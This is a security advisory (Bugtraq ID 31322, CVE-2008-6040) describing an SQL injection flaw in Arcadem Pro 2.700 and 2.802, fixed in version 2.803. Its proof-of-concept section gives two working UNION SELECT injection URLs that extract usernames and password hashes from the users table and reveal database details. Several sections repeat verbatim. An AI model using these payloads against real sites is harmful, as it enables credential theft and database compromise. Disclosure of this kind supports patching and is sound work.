Agares Media Arcadem Pro 'articleblock.php' SQL Injection Vulnerability
BID:31322
Info
Agares Media Arcadem Pro 'articleblock.php' SQL Injection Vulnerability
| Bugtraq ID: | 31322 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6040 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 12 2008 12:00AM |
| Updated: | Feb 11 2009 10:48PM |
| Credit: | Hussin X |
| Vulnerable: |
Agares Media Arcadem Pro 2.802 Agares Media Arcadem Pro 2.700 |
| Not Vulnerable: |
Agares Media Arcadem Pro 2.803 |
Discussion
Agares Media Arcadem Pro 'articleblock.php' SQL Injection Vulnerability
Arcadem Pro is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Arcadem Pro is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Exploit / POC
Agares Media Arcadem Pro 'articleblock.php' SQL Injection Vulnerability
Attackers can exploit this issue via a browser.
The following example URIs are available:
http://www.example.com/Script/index.php?loadpage=./includes/articleblock.php&articlecat=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10/**/FROM/**/amcms_users--
http://www.example.com/Script/index.php?loadpage=./includes/articleblock.php&articlecat=-1+union+select+1,version(),user(),4,5,6,7,8,9,10--
Attackers can exploit this issue via a browser.
The following example URIs are available:
http://www.example.com/Script/index.php?loadpage=./includes/articleblock.php&articlecat=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10/**/FROM/**/amcms_users--
http://www.example.com/Script/index.php?loadpage=./includes/articleblock.php&articlecat=-1+union+select+1,version(),user(),4,5,6,7,8,9,10--
Solution / Fix
Agares Media Arcadem Pro 'articleblock.php' SQL Injection Vulnerability
Solution:
The vendor released Arcadem Pro 2.803 to address this issue. Please see the references for more information.
Agares Media Arcadem Pro 2.802
Agares Media Arcadem Pro 2.700
Solution:
The vendor released Arcadem Pro 2.803 to address this issue. Please see the references for more information.
Agares Media Arcadem Pro 2.802
-
Agares Media ArcademPro2.80x_Upgrade_to_2.803.zip
http://updates.agaresmedia.com/ArcademPro2.80x_Upgrade_to_2.803.zip
Agares Media Arcadem Pro 2.700
-
Agares Media ArcademPro2.80x_Upgrade_to_2.803.zip
http://updates.agaresmedia.com/ArcademPro2.80x_Upgrade_to_2.803.zip
References
Agares Media Arcadem Pro 'articleblock.php' SQL Injection Vulnerability
References:
References:
- Arcadem Pro Homepage (Agares Media)
- [URGENT] Security Bug Fix & More in Arcadem Pro 2.803 update (Agares Media)